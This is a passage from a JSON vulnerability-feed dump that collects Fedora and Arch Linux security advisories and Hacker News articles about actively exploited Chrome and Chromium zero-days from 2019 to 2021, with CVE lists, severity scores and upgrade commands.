"Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-11-09T21:22:25", "published": "2019-11-09T21:22:25", "id": "FEDORA:3608E6051CC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: chromium-78.0.3904.87-1.fc31", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-11-15T03:55:58", "published": "2019-11-15T03:55:58", "id": "FEDORA:2B88A6092506", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-78.0.3904.87-1.fc30", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-11-15T03:20:57", "published": "2019-11-15T03:20:57", "id": "FEDORA:AC09F608BFF0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-78.0.3904.87-1.fc29", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2021-03-13T04:28:52", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166"], "description": "[](<https://thehackernews.com/images/-QHv1N-h4fZY/YD8letBQzWI/AAAAAAAAB64/E1KslMnXt0oEcr7e27y2idTnPPl_nm3VQCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\nExactly a month after [patching](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.\n\nChrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an \"object lifecycle issue in audio.\"\n\nTracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.\n\nWith no additional details, it's not immediately clear if the two security shortcomings are related.\n\n[](<https://thehackernews.com/images/--VPerofAuok/YD8mK08wMrI/AAAAAAAAB7I/VkM_Pg08vFQEvCxV3HbTbaDEd1HRja87QCLcBGAsYHQ/s0/hacking.jpg>)\n\nGoogle acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n\"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [said](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>).\n\nThis is the second zero-day flaw in Chrome that Google has addressed since the start of the year.\n\nOn February 4, the company [issued a fix](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Additionally, Google last year [resolved five Chrome zero-days](<https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html>) that were actively exploited in the wild in a span of one month between October 20 and November 12.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-13T02:55:42", "published": "2021-03-03T06:03:00", "id": "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "href": "https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T05:26:08", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "description": "[](<https://thehackernews.com/images/-tnjJ0FH8P0I/YEwt7ddHBcI/AAAAAAAACB8/2lR87aM5jBAUOKikDOdI3SWSC9ZG92FcgCLcBGAsYHQ/s0/chrome-browser-update.jpg>)\n\nGoogle has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.\n\nThe browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.\n\nWhile the update contains a total of five security fixes, the most important flaw rectified by Google concerns a [use after free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.\n\nDetails about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.\n\nAccording to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. \"By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,\" the report stated.\n\nAs is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n[](<https://thehackernews.com/images/-4e8UqaJKLag/YEwrYTe6kaI/AAAAAAAACB0/A61b0Tzs5nIymspbYAAIoURKA3zV5lE2QCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\n\"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) in a blog post.\n\nWith this update, Google has fixed three zero-day flaws in Chrome since the start of the year.\n\nEarlier this month, the company issued a fix for an \"object lifecycle issue in audio\" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-16T04:51:58", "published": "2021-03-13T03:16:00", "id": "THN:15BF409706D7240A5276C705732D745F", "href": "https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html", "type": "thn", "title": "Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T19:02:52", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "[](<https://1.bp.blogspot.com/-BDedlOwyk0U/Xbv7PVzvTLI/AAAAAAAA1k0/1Aer3FzoV0ofHVplfGk1INnY2EzQmswvACLcBGAsYHQ/s728-e100/google-chrome-hacking.png>)\n\nAttention readers, if you are using Chrome on your Windows, Mac, and Linux computers, you need to update your web browsing software immediately to the latest version Google released earlier today. \n \nWith the release of Chrome 78.0.3904.87, Google is warning billions of users to install an urgent software update immediately to patch two high severity vulnerabilities, one of which attackers are actively exploiting in the wild to hijack computers. \n \nWithout revealing technical details of the vulnerability, the Chrome security team only says that both issues are use-after-free vulnerabilities, one affecting Chrome's audio component (**CVE-2019-13720**) while the other resides in the PDFium (**CVE-2019-13721**) library. \n\n\n \nThe use-after-free vulnerability is a class of memory corruption issues that allows corruption or modification of data in the memory, enabling an unprivileged user to escalate privileges on an affected system or software. \n \nThus, both flaws could enable remote attackers to gain privileges on the Chrome web browser just by convincing targeted users into visiting a malicious website, allowing them to escape sandbox protections and run arbitrary malicious code on the targeted systems. \n \n\n\n## Google Chrome Zero-Day Under Active Attacks\n\n \nDiscovered and reported by Kaspersky researchers Anton Ivanov and Alexey Kulaev, the audio component issue in the Chrome application has been found exploited in the wild, though it remains unclear at the time which specific group of hackers. \n \n\n\n> \"Google is aware of reports that an exploit for CVE-2019-13720 exists in the wild,\" Google Chrome security team said in a [blog post](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\n \n\n\n> \"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\"\n\n \nThe [use-after-free issue](<https://thehackernews.com/2019/09/google-chrome-update.html>) is one of the most common vulnerabilities discovered and patched in the Chrome web browser in the past few months. \n \nJust over a month ago, Google released an urgent security update for Chrome to patch a total of [four use-after-free vulnerabilities](<https://thehackernews.com/2019/09/google-chrome-update.html>) in different components of the web browser, the most severe of which could allow remote hackers to take control of an affected system. \n\n\n \nIn March this year, Google also released an emergency [security update for Chrome](<https://thehackernews.com/2019/03/update-google-chrome-hack.html>) after miscreants were found actively exploiting a similar use-after-free Chrome zero-day vulnerability in the wild affecting the browser's FileReader component. \n \n\n\n## Technical Details of Chrome 0-day Exploit\n\n \nA day after Google released an emergency patch update for Chrome browser to fix two high-severity vulnerabilities, cybersecurity firm Kaspersky Labs revealed more technical details about the one that it reported to Google and was spotted being exploited in the wild. \n \nAccording to the researchers, attackers compromised a Korean-language news portal. They planted the exploit code on the site, like a watering-hole, to hack computers of its visitors opening the news portal using vulnerable versions of Google Chrome. \n\n\n[](<https://1.bp.blogspot.com/-0b8M8M8fp_w/Xbxsu-MXsoI/AAAAAAAA1lM/Oe9kuPoxP6ozEr3xPwug8zkpFN0ngBIWACLcBGAsYHQ/s728-e100/hacking.png>)\n\nThe exploit reportedly installs the first stage malware on the targeted systems after exploiting Chrome vulnerability (CVE-2019-13720), which then connects to a hard-coded remote command-and-control server to download the final payload. \n \nDubbed \"**Operation WizardOpium**\" by the researchers, the cyberattack has not yet been attributed to any specific group of hackers. Still, researchers found some similarities in the exploit code with the infamous [Lazarus hacking group](<https://thehackernews.com/2019/09/north-korea-cyber-attack.html>). \n \n\"So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with [Lazarus attacks](<https://thehackernews.com/2019/05/north-korean-hacking-tool.html>), although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks,\" Kaspersky said. \n\n\n \nFor more details on the Operation WizardOpium exploiting the recently-patched Chrome vulnerability, you can head on to the [new report](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) just published by Kaspersky. \n \n\n\n## Patch Available: Update Google Chrome Immediately\n\n \nTo patch both security vulnerabilities, Google has already started rolling out Chrome version 78.0.3904.87 for Windows, Mac, and Linux operating systems. \n \nAlthough the Chrome web browser automatically notifies users about the latest available version, users are recommended to manually trigger the update process by going to \"Help \u2192 About Google Chrome\" from the menu. \n \nBesides this, Chrome users are also recommended to run all software on their systems, whenever possible, as a non-privileged user in an attempt to diminish the effects of successful attacks exploiting any zero-day vulnerability. \n \nWe will update you with more information about these security vulnerabilities as soon as Google releases their technical details.\n", "modified": "2019-11-01T17:41:08", "published": "2019-11-01T09:32:00", "id": "THN:9C73175440CD28F1BCB5707C48282690", "href": "https://thehackernews.com/2019/11/chrome-zero-day-update.html", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser Now!", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-14T10:27:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220"], "description": "[](<https://thehackernews.com/images/-9Ndx9Vcrx9E/YHaB5SvoxwI/AAAAAAAACRI/WgbWr7Dgj6sRKNuvNcO4lj-zwEO5CNQdwCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\nGoogle on Tuesday released a new version of Chrome web-browsing software for Windows, Mac, and Linux with patches for two newly discovered security vulnerabilities for both of which it says exploits exist in the wild, allowing attackers to engage in active exploitation.\n\nOne of the two flaws concerns an insufficient validation of untrusted input in its V8 JavaScript rendering engine (CVE-2021-21220), which was demonstrated by Dataflow Security's Bruno Keith and Niklas Baumstark at the [Pwn2Own 2021](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) hacking contest last week.\n\n[](<https://go.thn.li/inside12> \"password auditor\" )\n\nWhile Google moved to fix the flaw quickly, security researcher Rajvardhan Agarwal published a [working exploit](<https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html>) over the weekend by reverse-engineering the patch that the Chromium team pushed to the open-source component, a factor that may have played a crucial role in the release.\n\n**UPDATE:** _Agarwal, in an email to The Hacker News, confirmed that there's [one more vulnerability](<https://twitter.com/r4j0x00/status/1382125720344793090>) affecting Chromium-based browsers that has been patched in the latest version of V8, but has not been included in the Chrome release rolling out today, thereby leaving users potentially vulnerable to attacks even after installing the new update._\n\n\"Even though both the flaws are different in nature, they can be exploited to gain RCE in the renderer process,\" Agarwal told The Hacker News via email. \"I suspect that the first patch was released with the Chrome update because of the published exploit but as the second patch was not applied to Chrome, it can still be exploited.\"\n\nAlso resolved by the company is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink browser engine (CVE-2021-21206). An anonymous researcher has been credited with reporting the flaw on April 7.\n\n[](<https://thehackernews.com/images/-Co9nqKO9t2I/YHaAjushveI/AAAAAAAACRA/uFUYN6VpoCwJz2lCJEMBEGAwXowVZlR3wCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\n\"Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) in a blog post.\n\n[](<https://go.thn.li/inside23> \"password auditor\" )\n\nIt's worth noting that the existence of an exploit is not evidence of active exploitation by threat actors. Since the start of the year, Google has fixed three shortcomings in Chrome that have been under attack, including [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>), [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>), and [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>).\n\nChrome 89.0.4389.128 is expected to roll out in the coming days. Users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-04-14T08:32:40", "published": "2021-04-14T05:48:00", "id": "THN:F197A729A4F49F957F9D5910875EBAAA", "href": "https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html", "type": "thn", "title": "Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-03-26T20:30:35", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "description": "Arch Linux Security Advisory ASA-202103-19\n==========================================\n\nSeverity: High\nDate : 2021-03-25\nCVE-ID : CVE-2020-27844 CVE-2021-21159 CVE-2021-21160 CVE-2021-21161\nCVE-2021-21162 CVE-2021-21163 CVE-2021-21165 CVE-2021-21166\nCVE-2021-21167 CVE-2021-21168 CVE-2021-21169 CVE-2021-21170\nCVE-2021-21171 CVE-2021-21172 CVE-2021-21173 CVE-2021-21174\nCVE-2021-21175 CVE-2021-21176 CVE-2021-21177 CVE-2021-21178\nCVE-2021-21179 CVE-2021-21180 CVE-2021-21181 CVE-2021-21182\nCVE-2021-21183 CVE-2021-21184 CVE-2021-21185 CVE-2021-21186\nCVE-2021-21187 CVE-2021-21188 CVE-2021-21189 CVE-2021-21190\nCVE-2021-21191 CVE-2021-21192 CVE-2021-21193\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1633\n\nSummary\n=======\n\nThe package vivaldi before version 3.7.2218.45-1 is vulnerable to\nmultiple issues including arbitrary code execution, insufficient\nvalidation, access restriction bypass, content spoofing, incorrect\ncalculation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 3.7.2218.45-1.\n\n# pacman -Syu \"vivaldi>=3.7.2218.45-1\"\n\nThe problems have been fixed upstream in version 3.7.2218.45.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-27844 (arbitrary code execution)\n\nA heap-based buffer overflow was discovered in lib/openjp2/t2.c:973 in\nthe current master (commit 18b1138fbe3bb0ae4aa2bf1369f9430a8ec6fa00) of\nOpenJPEG.\n\n- CVE-2021-21159 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21160 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the WebAudio\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21161 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21162 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21163 (insufficient validation)\n\nAn insufficient data validation security issue was found in the Reader\nMode component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21165 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21166 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21167 (arbitrary code execution)\n\nA use after free security issue was found in the bookmarks component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21168 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nappcache component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21169 (information disclosure)\n\nAn out of bounds memory access security issue was found in the V8\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21170 (content spoofing)\n\nAn incorrect security UI security issue was found in the Loader\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21171 (content spoofing)\n\nAn incorrect security UI security issue was found in the TabStrip and\nNavigation components of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21172 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the File\nSystem API component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21173 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nNetwork Internals component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21174 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nReferrer component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21175 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the Site\nisolation component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21176 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the full\nscreen mode component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21177 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nAutofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21178 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nCompositing component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21179 (arbitrary code execution)\n\nA use after free security issue was found in the Network Internals\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21180 (arbitrary code execution)\n\nA use after free security issue was found in the tab search component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21181 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nautofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21182 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nnavigations component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21183 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21184 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21185 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nextensions component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21186 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the QR\nscanning component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21187 (insufficient validation)\n\nAn insufficient data validation security issue was found in the URL\nformatting component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21188 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.72.\n\n- CVE-2021-21189 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\npayments component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21190 (arbitrary code execution)\n\nAn uninitialized use security issue was found in the PDFium component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21191 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21192 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the tab groups\ncomponent of the Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21193 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.90. Google is aware of\nreports that an exploit for this issue exists in the wild.\n\nImpact\n======\n\nA remote attacker might be able to bypass security measures, trick the\nuser into performing unwanted actions or execute arbitrary code.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-2-for-vivaldi-desktop-3-6/\nhttps://vivaldi.com/blog/vivaldi-fires-up-performance-2/\nhttps://github.com/uclouvain/openjpeg/issues/1299\nhttps://github.com/uclouvain/openjpeg/pull/1301\nhttps://github.com/uclouvain/openjpeg/commit/73fdf28342e4594019af26eb6a347a34eceb6296\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\nhttps://crbug.com/1171049\nhttps://crbug.com/1170531\nhttps://crbug.com/1173702\nhttps://crbug.com/1172054\nhttps://crbug.com/1111239\nhttps://crbug.com/1174582\nhttps://crbug.com/1177465\nhttps://crbug.com/1161144\nhttps://crbug.com/1152226\nhttps://crbug.com/1166138\nhttps://crbug.com/1111646\nhttps://crbug.com/1152894\nhttps://crbug.com/1150810\nhttps://crbug.com/1154250\nhttps://crbug.com/1158010\nhttps://crbug.com/1146651\nhttps://crbug.com/1170584\nhttps://crbug.com/1173879\nhttps://crbug.com/1174186\nhttps://crbug.com/1174943\nhttps://crbug.com/1175507\nhttps://crbug.com/1182767\nhttps://crbug.com/1049265\nhttps://crbug.com/1105875\nhttps://crbug.com/1131929\nhttps://crbug.com/1100748\nhttps://crbug.com/1153445\nhttps://crbug.com/1155516\nhttps://crbug.com/1161739\nhttps://crbug.com/1165392\nhttps://crbug.com/1166091\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html\nhttps://crbug.com/1167357\nhttps://crbug.com/1181387\nhttps://crbug.com/1186287\nhttps://security.archlinux.org/CVE-2020-27844\nhttps://security.archlinux.org/CVE-2021-21159\nhttps://security.archlinux.org/CVE-2021-21160\nhttps://security.archlinux.org/CVE-2021-21161\nhttps://security.archlinux.org/CVE-2021-21162\nhttps://security.archlinux.org/CVE-2021-21163\nhttps://security.archlinux.org/CVE-2021-21165\nhttps://security.archlinux.org/CVE-2021-21166\nhttps://security.archlinux.org/CVE-2021-21167\nhttps://security.archlinux.org/CVE-2021-21168\nhttps://security.archlinux.org/CVE-2021-21169\nhttps://security.archlinux.org/CVE-2021-21170\nhttps://security.archlinux.org/CVE-2021-21171\nhttps://security.archlinux.org/CVE-2021-21172\nhttps://security.archlinux.org/CVE-2021-21173\nhttps://security.archlinux.org/CVE-2021-21174\nhttps://security.archlinux.org/CVE-2021-21175\nhttps://security.archlinux.org/CVE-2021-21176\nhttps://security.archlinux.org/CVE-2021-21177\nhttps://security.archlinux.org/CVE-2021-21178\nhttps://security.archlinux.org/CVE-2021-21179\nhttps://security.archlinux.org/CVE-2021-21180\nhttps://security.archlinux.org/CVE-2021-21181\nhttps://security.archlinux.org/CVE-2021-21182\nhttps://security.archlinux.org/CVE-2021-21183\nhttps://security.archlinux.org/CVE-2021-21184\nhttps://security.archlinux.org/CVE-2021-21185\nhttps://security.archlinux.org/CVE-2021-21186\nhttps://security.archlinux.org/CVE-2021-21187\nhttps://security.archlinux.org/CVE-2021-21188\nhttps://security.archlinux.org/CVE-2021-21189\nhttps://security.archlinux.org/CVE-2021-21190\nhttps://security.archlinux.org/CVE-2021-21191\nhttps://security.archlinux.org/CVE-2021-21192\nhttps://security.archlinux.org/CVE-2021-21193", "modified": "2021-03-25T00:00:00", "published": "2021-03-25T00:00:00", "id": "ASA-202103-19", "href": "https://security.archlinux.org/ASA-202103-19", "type": "archlinux", "title": "[ASA-202103-19] vivaldi: multiple issues", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "Arch Linux Security Advisory ASA-201911-7\n=========================================\n\nSeverity: Critical\nDate : 2019-11-04\nCVE-ID : CVE-2019-13720\nPackage : electron\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1061\n\nSummary\n=======\n\nThe package electron before version 7.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 7.0.1-1.\n\n# pacman -Syu \"electron>=7.0.1-1\"\n\nThe problem has been fixed upstream in version 7.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://github.com/electron/electron/commit/25b3ee29cf9a8e3f59dcbabf7345b5b1360cd056\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "modified": "2019-11-04T00:00:00", "published": "2019-11-04T00:00:00", "id": "ASA-201911-7", "href": "https://security.archlinux.org/ASA-201911-7", "type": "archlinux", "title": "[ASA-201911-7] electron: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720"], "description": "Arch Linux Security Advisory ASA-201911-2\n=========================================\n\nSeverity: Critical\nDate : 2019-11-02\nCVE-ID : CVE-2019-13720\nPackage : qt5-webengine\nType : 